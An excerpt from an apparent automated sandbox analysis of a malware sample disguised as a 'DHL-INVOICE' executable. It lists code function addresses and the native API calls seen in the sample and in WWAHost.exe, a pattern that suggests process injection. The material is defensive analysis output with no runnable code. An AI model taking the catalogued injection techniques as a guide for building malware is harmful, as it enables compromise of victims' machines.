Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7799E8	3_2_1D7799E8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7F59C0	3_2_1D7F59C0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AE9A0	3_2_1D7AE9A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B9870	3_2_1D7B9870
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CB870	3_2_1D7CB870
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D796868	3_2_1D796868
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8298B2	3_2_1D8298B2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8618DA	3_2_1D8618DA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DE810	3_2_1D7DE810
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8678F3	3_2_1D8678F3
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3800	3_2_1D7B3800
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850835	3_2_1D850835
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B28C0	3_2_1D7B28C0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B58B0	3_2_1D7B58B0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D825870	3_2_1D825870
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86F872	3_2_1D86F872
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7C6882	3_2_1D7C6882
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D824BC0	3_2_1D824BC0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7EDB19	3_2_1D7EDB19
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0B10	3_2_1D7B0B10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86FB2E	3_2_1D86FB2E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86FA89	3_2_1D86FA89
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86CA13	3_2_1D86CA13
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CFAA0	3_2_1D7CFAA0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86EA5B	3_2_1D86EA5B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8675C6	3_2_1D8675C6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86F5C9	3_2_1D86F5C9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D87A526	3_2_1D87A526
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81D480	3_2_1D81D480
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0445	3_2_1D7B0445
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B2760	3_2_1D7B2760
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BA760	3_2_1D7BA760
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D771707	3_2_1D771707
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D866757	3_2_1D866757
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D4670	3_2_1D7D4670
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86A6C0	3_2_1D86A6C0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8236EC	3_2_1D8236EC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86F6F6	3_2_1D86F6F6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CC600	3_2_1D7CC600
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AC6E0	3_2_1D7AC6E0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84D62C	3_2_1D84D62C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85D646	3_2_1D85D646
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0680	3_2_1D7B0680
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7F717A	3_2_1D7F717A
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79F113	3_2_1D79F113
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D87010E	3_2_1D87010E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CB1E0	3_2_1D7CB1E0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84D130	3_2_1D84D130
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B51C0	3_2_1D7B51C0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8670F1	3_2_1D8670F1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BB0D0	3_2_1D7BB0D0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A00A0	3_2_1D7A00A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E508C	3_2_1D7E508C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85E076	3_2_1D85E076
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BE310	3_2_1D7BE310
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86F330	3_2_1D86F330
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A1380	3_2_1D7A1380
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D772245	3_2_1D772245
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FE1380	5_2_03FE1380
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0405D480	5_2_0405D480
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FFE310	5_2_03FFE310
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040BA526	5_2_040BA526
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AF5C9	5_2_040AF5C9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A75C6	5_2_040A75C6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0400C600	5_2_0400C600
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0408D62C	5_2_0408D62C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF51C0	5_2_03FF51C0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0409D646	5_2_0409D646
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04014670	5_2_04014670
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AA6C0	5_2_040AA6C0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040636EC	5_2_040636EC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FDF113	5_2_03FDF113
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AF6F6	5_2_040AF6F6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FFB0D0	5_2_03FFB0D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A6757	5_2_040A6757
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FE00A0	5_2_03FE00A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0409E076	5_2_0409E076
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0402508C	5_2_0402508C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF2760	5_2_03FF2760
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FFA760	5_2_03FFA760
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A70F1	5_2_040A70F1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040B010E	5_2_040B010E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FEC6E0	5_2_03FEC6E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0408D130	5_2_0408D130
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0403717A	5_2_0403717A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF0680	5_2_03FF0680
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0400B1E0	5_2_0400B1E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A124C	5_2_040A124C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AF330	5_2_040AF330
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF0445	5_2_03FF0445
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0406EC20	5_2_0406EC20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0409EC4C	5_2_0409EC4C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A6C69	5_2_040A6C69
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AEC60	5_2_040AEC60
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04089C98	5_2_04089C98
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04008CDF	5_2_04008CDF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0400FCE0	5_2_0400FCE0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040BACEB	5_2_040BACEB
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF0B10	5_2_03FF0B10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04077CE8	5_2_04077CE8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AFD27	5_2_040AFD27
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A7D4C	5_2_040A7D4C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04002DB0	5_2_04002DB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0408FDF4	5_2_0408FDF4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04032E48	5_2_04032E48
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04010E50	5_2_04010E50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FEE9A0	5_2_03FEE9A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04090E6D	5_2_04090E6D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A0EAD	5_2_040A0EAD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A9ED2	5_2_040A9ED2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF28C0	5_2_03FF28C0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0406FF40	5_2_0406FF40
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF58B0	5_2_03FF58B0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AFF63	5_2_040AFF63
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF9870	5_2_03FF9870
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FD6868	5_2_03FD6868
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AEFBF	5_2_040AEFBF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A1FC6	5_2_040A1FC6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF3800	5_2_03FF3800
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0401E810	5_2_0401E810
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF6FE0	5_2_03FF6FE0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04090835	5_2_04090835
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0400B870	5_2_0400B870
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04065870	5_2_04065870
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AF872	5_2_040AF872
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04006882	5_2_04006882
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040698B2	5_2_040698B2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A18DA	5_2_040A18DA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040A78F3	5_2_040A78F3
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FFCF00	5_2_03FFCF00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FE2EE8	5_2_03FE2EE8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF1EB2	5_2_03FF1EB2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AE9A6	5_2_040AE9A6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040359C0	5_2_040359C0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040ACA13	5_2_040ACA13
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF9DD0	5_2_03FF9DD0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AEA5B	5_2_040AEA5B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AFA89	5_2_040AFA89
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF0D69	5_2_03FF0D69
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0400FAA0	5_2_0400FAA0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FEAD00	5_2_03FEAD00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_0402DB19	5_2_0402DB19
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF8CE0	5_2_03FF8CE0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040AFB2E	5_2_040AFB2E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FF3C60	5_2_03FF3C60
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04064BC0	5_2_04064BC0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FFAC20	5_2_03FFAC20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FE0C12	5_2_03FE0C12
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D38880	5_2_02D38880
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D5124E	5_2_02D5124E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D3E730	5_2_02D3E730
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D3E729	5_2_02D3E729
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D5152B	5_2_02D5152B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4FA16	5_2_02D4FA16
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4FA09	5_2_02D4FA09
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D32FB0	5_2_02D32FB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D39CFC	5_2_02D39CFC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D50C4F	5_2_02D50C4F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D50C65	5_2_02D50C65
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D32D90	5_2_02D32D90
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D32D8B	5_2_02D32D8B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D39D00	5_2_02D39D00

Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: String function: 0405E692 appears 86 times
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: String function: 03FDB910 appears 262 times
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: String function: 0406EF10 appears 105 times
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: String function: 04037BE4 appears 96 times
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: String function: 04025050 appears 32 times
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: String function: 1D7F7BE4 appears 95 times
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: String function: 1D79B910 appears 266 times
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: String function: 1D81E692 appears 84 times
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: String function: 1D82EF10 appears 100 times

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_74112A74 NtProtectVirtualMemory,GetLastError,	1_2_74112A74
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03283B6E NtWriteVirtualMemory,	1_2_03283B6E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03295803 NtQueryInformationProcess,	1_2_03295803
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03294842 NtProtectVirtualMemory,	1_2_03294842
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2D10 NtQuerySystemInformation,LdrInitializeThunk,	3_2_1D7E2D10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_1D7E2DC0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2DA0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_1D7E2DA0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2C50 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_1D7E2C50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2C30 NtMapViewOfSection,LdrInitializeThunk,	3_2_1D7E2C30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2CF0 NtDelayExecution,LdrInitializeThunk,	3_2_1D7E2CF0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2F00 NtCreateFile,LdrInitializeThunk,	3_2_1D7E2F00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2E50 NtCreateSection,LdrInitializeThunk,	3_2_1D7E2E50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2ED0 NtResumeThread,LdrInitializeThunk,	3_2_1D7E2ED0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2EB0 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_1D7E2EB0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E29F0 NtReadFile,LdrInitializeThunk,	3_2_1D7E29F0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_1D7E2B10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2BC0 NtQueryInformationToken,LdrInitializeThunk,	3_2_1D7E2BC0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2B90 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_1D7E2B90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2A80 NtClose,LdrInitializeThunk,	3_2_1D7E2A80
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E34E0 NtCreateMutant,LdrInitializeThunk,	3_2_1D7E34E0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2D50 NtWriteVirtualMemory,	3_2_1D7E2D50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E3C30 NtOpenProcessToken,	3_2_1D7E3C30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2C20 NtSetInformationFile,	3_2_1D7E2C20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2C10 NtOpenProcess,	3_2_1D7E2C10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2CD0 NtEnumerateKey,	3_2_1D7E2CD0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E3C90 NtOpenThread,	3_2_1D7E3C90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2F30 NtOpenDirectoryObject,	3_2_1D7E2F30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2FB0 NtSetValueKey,	3_2_1D7E2FB0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2E00 NtQueueApcThread,	3_2_1D7E2E00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2EC0 NtQuerySection,	3_2_1D7E2EC0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2E80 NtCreateProcessEx,	3_2_1D7E2E80
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E29D0 NtWaitForSingleObject,	3_2_1D7E29D0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E38D0 NtGetContextThread,	3_2_1D7E38D0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2B20 NtQueryInformationProcess,	3_2_1D7E2B20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2B00 NtQueryValueKey,	3_2_1D7E2B00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2BE0 NtQueryVirtualMemory,	3_2_1D7E2BE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2B80 NtCreateKey,	3_2_1D7E2B80
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2A10 NtWriteFile,	3_2_1D7E2A10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2AC0 NtEnumerateValueKey,	3_2_1D7E2AC0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E2AA0 NtQueryInformationFile,	3_2_1D7E2AA0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E4570 NtSuspendThread,	3_2_1D7E4570
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E4260 NtSetContextThread,	3_2_1D7E4260
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040234E0 NtCreateMutant,LdrInitializeThunk,	5_2_040234E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022C30 NtMapViewOfSection,LdrInitializeThunk,	5_2_04022C30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022CF0 NtDelayExecution,LdrInitializeThunk,	5_2_04022CF0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022D10 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04022D10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_04022DC0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022E50 NtCreateSection,LdrInitializeThunk,	5_2_04022E50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022F00 NtCreateFile,LdrInitializeThunk,	5_2_04022F00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040229F0 NtReadFile,LdrInitializeThunk,	5_2_040229F0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022A10 NtWriteFile,LdrInitializeThunk,	5_2_04022A10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022A80 NtClose,LdrInitializeThunk,	5_2_04022A80
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022AC0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_04022AC0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022B00 NtQueryValueKey,LdrInitializeThunk,	5_2_04022B00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022B10 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_04022B10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022B80 NtCreateKey,LdrInitializeThunk,	5_2_04022B80
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022B90 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04022B90
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022BC0 NtQueryInformationToken,LdrInitializeThunk,	5_2_04022BC0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04024570 NtSuspendThread,	5_2_04024570
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04024260 NtSetContextThread,	5_2_04024260
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022C10 NtOpenProcess,	5_2_04022C10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022C20 NtSetInformationFile,	5_2_04022C20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04023C30 NtOpenProcessToken,	5_2_04023C30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022C50 NtUnmapViewOfSection,	5_2_04022C50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04023C90 NtOpenThread,	5_2_04023C90
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022CD0 NtEnumerateKey,	5_2_04022CD0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022D50 NtWriteVirtualMemory,	5_2_04022D50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022DA0 NtReadVirtualMemory,	5_2_04022DA0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022E00 NtQueueApcThread,	5_2_04022E00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022E80 NtCreateProcessEx,	5_2_04022E80
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022EB0 NtProtectVirtualMemory,	5_2_04022EB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022EC0 NtQuerySection,	5_2_04022EC0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022ED0 NtResumeThread,	5_2_04022ED0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022F30 NtOpenDirectoryObject,	5_2_04022F30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022FB0 NtSetValueKey,	5_2_04022FB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040238D0 NtGetContextThread,	5_2_040238D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_040229D0 NtWaitForSingleObject,	5_2_040229D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022AA0 NtQueryInformationFile,	5_2_04022AA0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022B20 NtQueryInformationProcess,	5_2_04022B20
